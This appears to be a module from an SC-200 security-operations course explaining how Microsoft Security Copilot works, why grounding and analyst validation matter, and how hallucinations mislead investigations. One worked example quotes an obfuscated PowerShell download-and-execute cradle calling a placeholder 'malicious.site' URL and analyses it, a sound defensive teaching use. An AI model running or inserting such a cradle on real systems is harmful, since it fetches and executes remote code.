5.1 Generative AI for Security Operations

12-16 hours · Module 5

Generative AI for Security Operations

SC-200 Exam Objective

Domain 3 — Manage Incident Response: "Investigate incidents by using agentic AI, including embedded Copilot for Security." Understanding generative AI fundamentals is prerequisite to using Copilot effectively and evaluating its output critically.

Introduction

Before using Security Copilot, you need to understand what it is and what it is not. Copilot is not a button that solves incidents. It is not an analyst replacement. It is not infallible. It is a generative AI assistant that processes natural language prompts and produces natural language responses, grounded in security data from your environment and Microsoft’s threat intelligence. Its output is often excellent, sometimes wrong, and always requires validation by a qualified analyst.

This subsection provides the conceptual foundation for understanding how Copilot works, why grounding matters for security accuracy, what hallucination risk means in an investigation context (where a wrong answer is not just unhelpful — it can lead to incorrect response actions), and what realistic expectations look like for AI-assisted security operations.


What large language models are (and are not)

Security Copilot is built on large language models (LLMs) — the same foundational technology as ChatGPT, but with critical additions for security operations. Understanding LLMs at a conceptual level helps you predict when Copilot will be accurate and when it might produce incorrect output.

An LLM is a neural network trained on massive amounts of text data. It learns patterns in language — not facts, not logic, not reasoning, but statistical patterns of which words follow which other words in which contexts. When you prompt Copilot with “Summarise this incident,” the model generates a response by predicting the most likely next word, then the next, then the next, based on the patterns it learned during training and the context of your prompt.

What this means for security operations:

LLMs are excellent at summarisation — taking a large volume of alert data, log entries, and investigation notes, and producing a coherent narrative. They are excellent at translation — converting natural language (“show me all failed sign-ins from Russia in the last 24 hours”) into KQL queries. They are excellent at explanation — describing what a PowerShell script does, what an alert means, or what a MITRE ATT&CK technique involves. These are language tasks, and LLMs are exceptionally good at language tasks.

LLMs are less reliable at reasoning about novel situations that were not represented in their training data, at mathematical calculations, at precise factual recall (they may “remember” training data incorrectly), and at distinguishing between plausible-sounding output and correct output. These limitations are not bugs — they are inherent characteristics of how statistical language models work.

The hallucination problem in security contexts

LLMs sometimes generate output that is confidently stated, grammatically correct, and completely wrong. In a casual conversation, this is an inconvenience. In a security investigation, it is dangerous. If Copilot generates a KQL query that looks correct but has a subtle logical error (wrong operator, incorrect time window, missing filter), the query returns incorrect results — and you may base investigation conclusions on those results. If Copilot summarises an incident and includes a detail that does not exist in the actual alert data, you may report a finding that is not supported by evidence. Every Copilot output must be validated before it is acted upon or documented.


Grounding: why Security Copilot is not just an LLM

The difference between a general-purpose LLM and Security Copilot is grounding — the mechanism that connects the model to your organisation’s actual security data. When you ask Copilot “Summarise incident INC-2026-0321,” it does not generate a summary from its training data (which knows nothing about your incidents). It retrieves the incident data from Defender XDR, feeds that data into the prompt context, and generates a summary grounded in the actual incident details.

SECURITY COPILOT — GROUNDED AI ARCHITECTUREYour Prompt"Summarise incident 321"Orchestration LayerIdentifies data sources neededRetrieves via pluginsDefender XDR | Sentinel | Entra ID | TI feedsLLMPrompt + grounding dataGrounded ResponseBased on YOUR data
Figure 5.1: Security Copilot's grounded AI architecture. Your prompt is processed by an orchestration layer that identifies which data sources to query (Defender XDR, Sentinel, Entra ID, threat intelligence feeds). The retrieved data is combined with your prompt and sent to the LLM. The response is grounded in your actual security data — not generated from generic training data.

Grounding sources include:

Microsoft Defender XDR — incidents, alerts, device timelines, email events, identity events, and Advanced Hunting data from your tenant.

Microsoft Sentinel — log data, analytics rules, incidents, and hunting queries from your Sentinel workspace.

Microsoft Entra ID — sign-in logs, user risk data, conditional access evaluation results.

Microsoft Purview — audit log data, DLP findings, compliance status.

Microsoft threat intelligence — Microsoft’s own threat intelligence database, which includes threat actor profiles, attack technique descriptions, IOC databases, and vulnerability information.

Third-party plugins — additional data sources connected through the plugin architecture (custom APIs, SOAR platforms, ITSM tools).

The quality of Copilot’s output depends directly on the quality and availability of grounding data. If your Sentinel workspace does not contain the relevant logs, Copilot cannot query them. If your Defender XDR incident is incomplete (missing correlated alerts because a connector is misconfigured), Copilot’s summary will be incomplete. Grounding is only as good as the data infrastructure you built in Modules 1-4.


What Copilot can and cannot do

Security Copilot — Realistic Capability Assessment
TaskCopilot's abilityAnalyst's role
Summarise a complex incidentExcellent — fast, comprehensiveVerify accuracy against raw data
Explain what an alert meansExcellent — contextual explanationAssess relevance to your environment
Generate KQL queries from natural languageGood — usually correct, sometimes wrongValidate query logic before running
Analyse a PowerShell/Python scriptExcellent — detailed breakdownVerify against known malware patterns
Recommend response actionsGood — reasonable suggestionsEvaluate appropriateness for context
Draft an incident reportGood — structured, comprehensiveEdit for accuracy, add context
Determine root cause of a novel attackLimited — may miss novel patternsApply investigation expertise
Make response decisionsCannot — suggests, does not decideAll decisions are the analyst's
Access data outside your tenantCannot — grounded to your data onlyUnderstand data boundaries
Replace analyst expertiseCannot — amplifies, does not replaceYou are the expert; Copilot is the tool
The human-in-the-loop principle: Copilot generates output. You evaluate it. Copilot suggests actions. You decide. Copilot drafts reports. You verify and approve. This is not a limitation — it is the correct operational model. An AI system that makes unvalidated security decisions is a liability, not an asset. The analyst's judgement is the quality control layer.

The accuracy problem: why validation is non-negotiable

Copilot’s output is correct most of the time. “Most of the time” is not good enough for security operations, where a single incorrect conclusion can lead to wrong response actions, missed threats, or false reports to management.

Scenario 1: KQL query with a subtle error. You ask Copilot to generate a query for “all sign-ins from Russia in the last 24 hours.” Copilot generates a query that filters on LocationDetails.countryOrRegion == "Russia". But the correct value in your logs is "RU" (ISO country code), not "Russia" (full country name). The query returns zero results. If you trust the query without validation, you conclude there were no sign-ins from Russia — when in fact there were 15. The investigation misses the compromise.

Scenario 2: Incident summary that includes a non-existent detail. Copilot summarises an incident and states “the attacker exfiltrated 2.3 GB of data from the customer-data storage account.” You include this in the incident report. But the actual incident data shows the attacker accessed the storage account — it does not confirm data download volume. Copilot inferred the detail from the alert description, but the specific number was hallucinated. The incident report now contains an unsupported claim.

Scenario 3: Response recommendation that is inappropriate for context. Copilot recommends “disable the compromised user’s account.” This is generally correct for a compromised account. But in this case, the user is the CFO who is about to join a board meeting in 15 minutes. Disabling their account without coordination will disrupt a critical business function. Copilot does not know about the board meeting. The analyst does.

The validation principle: Copilot output is a draft, not a deliverable. Every KQL query is tested before trusting results. Every incident summary is cross-checked against the raw alert data. Every response recommendation is evaluated against operational context. This validation step takes 2-5 minutes — a small investment compared to the hours Copilot saves in generating the initial output.


Realistic expectations for AI-assisted SOC operations

Security Copilot does not transform a novice into an expert. It transforms an expert into a faster expert. The acceleration is real and significant — an experienced analyst using Copilot can investigate incidents 40-60% faster than the same analyst working manually. But the acceleration depends on the analyst’s ability to evaluate and refine Copilot’s output.

Where Copilot saves the most time:

Alert triage — Copilot can summarise a complex multi-alert incident in 10 seconds that would take an analyst 10 minutes to read through manually. This is the highest-value use case for daily SOC operations.

KQL query generation — translating investigation questions into KQL queries. Instead of writing queries from scratch, the analyst describes what they need in natural language and Copilot generates the query. The analyst validates and runs it. Time saved: 5-15 minutes per query.

Script analysis — when an alert includes a suspicious PowerShell, Python, or bash script, Copilot analyses the script and explains what each section does. This is particularly valuable for obfuscated scripts that would take significant manual effort to deobfuscate and analyse.

Report drafting — generating the initial draft of an incident report from the investigation data. The analyst edits for accuracy, adds context, and refines the conclusions. Time saved: 30-60 minutes per report.

Where Copilot does not save time:

Novel attack patterns — if the attack is truly novel (not represented in training data or threat intelligence), Copilot may not recognise it. The analyst’s pattern recognition and investigative intuition remain essential.

Contextual decisions — Copilot does not know your organisation’s risk tolerance, business context, or operational constraints. Response decisions require human judgement.

Evidence validation — confirming that investigation findings are supported by the evidence requires the analyst to examine the raw data. Copilot can point you to the data, but you must verify it.


Retrieval vs reasoning: understanding Copilot’s strengths

Copilot excels at retrieval tasks — finding data, summarising data, and translating between formats (natural language to KQL, raw data to narrative, technical findings to executive summary). These are tasks where the answer exists in the grounding data and Copilot needs to find and present it.

Copilot is weaker at reasoning tasks — determining whether a pattern of activity is malicious, predicting what an attacker will do next, or deciding which of two ambiguous findings is more important. These tasks require judgement that the model approximates from training patterns but does not truly perform.

Practical implication for SOC workflow: Delegate retrieval to Copilot. Retain reasoning for the analyst.

Retrieval examples (delegate): “What are the alerts in this incident?” “Generate a KQL query for sign-ins from Russia.” “Explain what this PowerShell command does.” “List the MITRE ATT&CK techniques in this incident.”

Reasoning examples (retain): “Is this a true positive or a false positive?” “Should we isolate this server or restrict its network access?” “Is the data exposure severe enough to trigger regulatory notification?” “Is this attacker likely to return through a different vector?”

The distinction is not always clear-cut — some tasks blend retrieval and reasoning. Copilot’s MITRE ATT&CK mapping is mostly retrieval (matching observed activity to documented techniques) but includes reasoning when the activity does not perfectly match any technique. In these blended cases, validate the reasoning component even if the retrieval component is clearly correct.


Worked comparison: script analysis manual vs Copilot

To make the time difference concrete, consider a real-world script analysis scenario.

A Defender for Endpoint alert includes this PowerShell command line:

powershell -w hidden -nop -c "IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9tYWxpY2lvdXMuc2l0ZS9wYXlsb2Fk')))"

Manual analysis (15-20 minutes): Recognise Base64 encoding. Extract the Base64 string. Decode it using a Base64 decoder (CyberChef, PowerShell, or Python). Read the decoded content (a URL). Recognise that IEX downloads and executes content from the URL. Check the URL against threat intelligence. Assess the overall purpose: this is a download-and-execute cradle — Stage 1 of a multi-stage attack. Document the findings: the execution technique, the C2 URL, and the assessment.

Copilot analysis (30 seconds): Paste the command into Copilot with the prompt “Analyse this PowerShell command. Decode any encoded content. Identify IOCs. Assess the purpose.”

Copilot responds: “This PowerShell command uses hidden window mode (-w hidden) and no profile (-nop) to execute a Base64-encoded Invoke-Expression command. The decoded Base64 string is the URL ‘https://malicious.site/payload'. The command downloads and executes content from this URL using IEX (Invoke-Expression), which is a common download-and-execute cradle used for initial payload delivery. IOC: malicious.site. Assessment: Stage 1 payload delivery — the downloaded content is likely a second-stage implant or C2 beacon.”

Analyst validation (1 minute): Manually decode the Base64 to confirm the URL matches Copilot’s decoding. Check the URL against threat intelligence. Confirmed — the analysis is accurate.

Total: 1.5 minutes with Copilot vs 15-20 minutes manual. For heavily obfuscated scripts with multiple layers of encoding, variable substitution, and string concatenation, the time savings are even greater — 30 seconds vs 45-60 minutes.

Try it yourself

If your organisation has Security Copilot enabled, navigate to securitycopilot.microsoft.com and explore the standalone experience. Try a simple prompt: "What is Microsoft Defender XDR?" and evaluate the response. Is it accurate? Is it grounded in your environment's data, or is it a general knowledge response? Then try an environment-specific prompt: "Show me the most recent incidents in my Defender XDR portal." Compare the two responses — the first is generic knowledge (from training data), the second is grounded in your data (from the Defender XDR plugin). This demonstrates the grounding difference.

What you should observe

The general knowledge prompt produces a textbook-style response. The environment-specific prompt produces a response that references your actual incidents, alert names, and affected entities. If Copilot cannot access your Defender XDR data (plugin not configured, insufficient permissions), the environment-specific prompt returns an error or a generic response — demonstrating that grounding requires properly configured data access.


Knowledge check

Check your understanding

1. Copilot generates a KQL query for your investigation. How should you handle it?

Validate the query before running it. Check the table names, field names, operators, filter values, and time windows against your knowledge of the data schema. Run the query and verify the results make sense — do the returned records match what you expect? If the query returns unexpected results (zero rows when you expect matches, or too many rows), check for the common LLM errors: wrong field values (country name vs country code), incorrect operators (== vs has), missing filters, or wrong table names.
Run it immediately — Copilot queries are always correct
Rewrite it from scratch — Copilot queries cannot be trusted
Copy it into the incident report without running it

2. What is "grounding" in the context of Security Copilot?

Grounding connects the LLM to your organisation's actual security data through plugins. When you ask Copilot about an incident, the orchestration layer retrieves the incident data from Defender XDR and feeds it into the prompt context. The LLM generates a response based on your actual data — not from generic training knowledge. Without grounding, Copilot would produce generic security information rather than environment-specific analysis.
Training the model on your organisation's data
Installing the Copilot agent on endpoints
Restricting Copilot to only security topics

3. A junior analyst asks: "If Copilot can summarise incidents and generate KQL, why do I need to learn investigation skills?" What do you tell them?

Copilot amplifies expertise — it does not replace it. Without investigation skills, you cannot evaluate whether Copilot's summary is accurate, whether the generated KQL is correct, or whether the recommended response is appropriate. Copilot makes an expert faster. It does not make a novice an expert. Learning to investigate manually (Modules 1-4) is prerequisite to using Copilot effectively — the AI output is only as useful as your ability to validate it.
They are right — Copilot eliminates the need for manual investigation
Investigation skills are only needed when Copilot is unavailable
Copilot is just a trend — it will not last